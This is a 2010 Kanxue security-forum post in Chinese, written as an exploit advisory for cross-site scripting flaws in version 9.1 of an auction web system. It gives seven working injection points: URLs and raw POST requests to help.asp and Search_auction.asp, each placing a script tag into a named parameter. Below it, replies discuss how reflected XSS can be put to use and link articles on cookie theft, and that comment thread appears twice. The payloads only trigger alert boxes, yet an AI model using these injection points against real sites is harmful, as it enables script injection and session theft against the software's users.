[原创]宝贝儿拍卖系统v9.1跨站0day漏洞-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创]宝贝儿拍卖系统v9.1跨站0day漏洞

发表于: 2010-4-25 15:15 3041

[原创]宝贝儿拍卖系统v9.1跨站0day漏洞

riusksk

2010-4-25 15:15

3041

# Exploit Title: 宝贝儿拍卖系统v9.1跨站0day漏洞
# Date: 2010-4-25
# Author: riusksk(泉哥)
# Blog：http://riusksk.blogbus.com
# Tested on: [Windows 7 IIS + Firefox + Maxthon]
# Version：V9.1
# Download：http://cnbbr.com/downsoft.asp?softname=bbr

XSS:

=======================================0x01===============================================

http://127.0.0.1/help.asp?info_Name=1</title><script>alert(/riusksk/)</script>&searchBtns=%CB%D1%20%CB%F7&classid=1

=======================================0x02===============================================

POST /Search_auction.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 127.0.0.1
Content-Length: 245
Cookie: bbr9%2Ecnbbr%2Ecom=BBR%5FSkinsPath=default;ASPSESSIONIDQQQQQCSQ=KOMNAMDBKJNCNNBAIHMIJJEF;BBRRndSellCode=;leftmenuli=listli1
Connection: Close
Pragma: no-cache

page=1&B4=%D7%AA%CF%F2&BBR_AucName=1&BBR_AucPrice_Small=0&BBR_AucPrice_Large=0&S1=0&S2=0&TPL_Prov=1><script>alert(/riusksk/)</script>&TPL_City=1&Place=1&BBR_AucOldNew=0&BBR_AucZhiFu=1&BBR_AucAvailDate=0&BBR_AucCloseDate=0&BBR_AucType=1

=======================================0x03===============================================

POST /Search_auction.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 127.0.0.1
Content-Length: 245
Cookie: bbr9%2Ecnbbr%2Ecom=BBR%5FSkinsPath=default;ASPSESSIONIDQQQQQCSQ=KOMNAMDBKJNCNNBAIHMIJJEF;BBRRndSellCode=;leftmenuli=listli1
Connection: Close
Pragma: no-cache

page=1&B4=%D7%AA%CF%F2&BBR_AucName=1&BBR_AucPrice_Small=0&BBR_AucPrice_Large=0&S1=0&S2=0&TPL_Prov=1&TPL_City=1><script>alert(/riusksk/)</script>&Place=1&BBR_AucOldNew=0&BBR_AucZhiFu=1&BBR_AucAvailDate=0&BBR_AucCloseDate=0&BBR_AucType=1

=======================================0x04===============================================

POST /Search_auction.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 127.0.0.1
Content-Length: 245
Cookie: bbr9%2Ecnbbr%2Ecom=BBR%5FSkinsPath=default;ASPSESSIONIDQQQQQCSQ=KOMNAMDBKJNCNNBAIHMIJJEF;BBRRndSellCode=;leftmenuli=listli1
Connection: Close
Pragma: no-cache

page=1&B4=%D7%AA%CF%F2&BBR_AucName=1&BBR_AucPrice_Small=0&BBR_AucPrice_Large=0&S1=0&S2=0&TPL_Prov=1&TPL_City=1&Place=1><script>alert(/riusksk/)</script>&BBR_AucOldNew=0&BBR_AucZhiFu=1&BBR_AucAvailDate=0&BBR_AucCloseDate=0&BBR_AucType=1

=======================================0x05===============================================

POST /Search_auction.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 127.0.0.1
Content-Length: 245
Cookie: bbr9%2Ecnbbr%2Ecom=BBR%5FSkinsPath=default;ASPSESSIONIDQQQQQCSQ=KOMNAMDBKJNCNNBAIHMIJJEF;BBRRndSellCode=;leftmenuli=listli1
Connection: Close
Pragma: no-cache

page=1&B4=%D7%AA%CF%F2&BBR_AucName=1&BBR_AucPrice_Small=0&BBR_AucPrice_Large=0&S1=0&S2=0&TPL_Prov=1&TPL_City=1&Place=1&BBR_AucOldNew=0&BBR_AucZhiFu=1><script>alert(/riusksk/)</script>&BBR_AucAvailDate=0&BBR_AucCloseDate=0&BBR_AucType=1

=======================================0x06===============================================

POST /Search_auction.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 127.0.0.1
Content-Length: 245
Cookie: bbr9%2Ecnbbr%2Ecom=BBR%5FSkinsPath=default;ASPSESSIONIDQQQQQCSQ=KOMNAMDBKJNCNNBAIHMIJJEF;BBRRndSellCode=;leftmenuli=listli1
Connection: Close
Pragma: no-cache

page=1&B4=%D7%AA%CF%F2&BBR_AucName=1&BBR_AucPrice_Small=0&BBR_AucPrice_Large=0&S1=0&S2=0&TPL_Prov=1&TPL_City=1&Place=1&BBR_AucOldNew=0&BBR_AucZhiFu=1&BBR_AucAvailDate=0&BBR_AucCloseDate=0&BBR_AucType=1><script>alert(/riusksk/)</script>

=======================================0x07===============================================

http://127.0.0.1/Search_auction.asp?BBR_AucName=1&BBR_AucOwner=0&BBR_AucPrice_Small=0&BBR_AucPrice_Large=0&BBRPath=1><script>alert(/riusksk/)</script>&TPL_Prov=1&TPL_City=1&Place=1&BBR_AucOldNew=0&BBR_AucZhiFu=1&BBR_AucAvailDate=0&BBR_AucCloseDate=0&BBR_AucType=1&BBR_AucCom=0&BBR_AucOrder=0&DispInfoType=0&page=1

=======================================EOF================================================

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・2

免费・0

支持

最新回复 (7)
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 259 关注私信	riusksk 41 2 楼继续娱乐中…… 2010-4-25 15:17 0
酒醒黄昏雪币： 42 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 29 粉丝 0 关注私信	酒醒黄昏 3 楼强悍 2010-4-25 20:46 0
kuang110 雪币： 89 活跃值： (185) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 338 粉丝 0 关注私信	kuang110 6 4 楼有啥利用价值呢？貌似只能意淫啊 2010-5-2 13:29 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 259 关注私信	riusksk 41 5 楼关键是要看你怎么利用了，推荐两篇文章：《如何将反射型XSS变成持久型XSS：论跨域获取cookie》： http://hi.baidu.com/aullik5/blog/item/02bccaeb018dc4d5d539c930.html 《浅谈反射型XSS的利用》: http://hi.baidu.com/zrxc/blog/item/aa146f1b5453dcf2ae51332d.html 2010-5-3 19:06 0
kuang110 雪币： 89 活跃值： (185) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 338 粉丝 0 关注私信	kuang110 6 6 楼反射型XSS,还是比较被动的，不管怎么样，都是要用户触发的。利用的方法是花样很多，但是前提是用户触发了这个反射型XSS啊。呵呵，不知道偶说的对不对哈 2010-5-3 23:50 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 259 关注私信	riusksk 41 7 楼那存储型XSS不需要用户去触发？ 2010-5-4 12:26 0
kuang110 雪币： 89 活跃值： (185) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 338 粉丝 0 关注私信	kuang110 6 8 楼需要哈，不过两种触发的形式不一样哈。那个如何将反射型XSS变成持久型XSS 给我的感觉就是用一个XSS去触发另一个反射型XSS。不如持久型XSS来的直接啊。所以我觉得反射型XSS利用起来好像不是很方便哈呵呵 2010-5-4 13:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

riusksk

169

发帖

2648

回帖

1820

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (7)
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 259 关注私信	riusksk 41 2 楼继续娱乐中…… 2010-4-25 15:17 0
酒醒黄昏雪币： 42 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 29 粉丝 0 关注私信	酒醒黄昏 3 楼强悍 2010-4-25 20:46 0
kuang110 雪币： 89 活跃值： (185) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 338 粉丝 0 关注私信	kuang110 6 4 楼有啥利用价值呢？貌似只能意淫啊 2010-5-2 13:29 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 259 关注私信	riusksk 41 5 楼关键是要看你怎么利用了，推荐两篇文章：《如何将反射型XSS变成持久型XSS：论跨域获取cookie》： http://hi.baidu.com/aullik5/blog/item/02bccaeb018dc4d5d539c930.html 《浅谈反射型XSS的利用》: http://hi.baidu.com/zrxc/blog/item/aa146f1b5453dcf2ae51332d.html 2010-5-3 19:06 0
kuang110 雪币： 89 活跃值： (185) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 338 粉丝 0 关注私信	kuang110 6 6 楼反射型XSS,还是比较被动的，不管怎么样，都是要用户触发的。利用的方法是花样很多，但是前提是用户触发了这个反射型XSS啊。呵呵，不知道偶说的对不对哈 2010-5-3 23:50 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 259 关注私信	riusksk 41 7 楼那存储型XSS不需要用户去触发？ 2010-5-4 12:26 0
kuang110 雪币： 89 活跃值： (185) 能力值： ( LV9，RANK：270 ) 在线值：发帖 18 回帖 338 粉丝 0 关注私信	kuang110 6 8 楼需要哈，不过两种触发的形式不一样哈。那个如何将反射型XSS变成持久型XSS 给我的感觉就是用一个XSS去触发另一个反射型XSS。不如持久型XSS来的直接啊。所以我觉得反射型XSS利用起来好像不是很方便哈呵呵 2010-5-4 13:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复